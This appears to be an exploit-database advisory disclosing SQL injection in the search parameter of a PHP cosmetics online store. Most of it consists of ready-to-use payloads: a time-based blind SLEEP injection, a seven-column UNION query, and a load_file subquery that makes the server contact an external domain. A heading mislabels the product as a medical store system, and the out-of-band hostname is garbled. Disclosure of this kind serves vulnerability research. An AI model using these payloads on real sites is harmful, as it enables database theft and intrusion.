## Title: Cosmetics-and-Beauty-Product-Online-Store v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.18.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html
## CVE-Medical Store Management System v1.0


## Description:
The search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0
appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\vcu'))+'
was submitted in the search parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'')
AND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select
load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'')
UNION ALL SELECT
47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47--
-
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store/SQL-Injection)

## Proof and Exploit:
[href](https://streamable.com/9b2avg)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>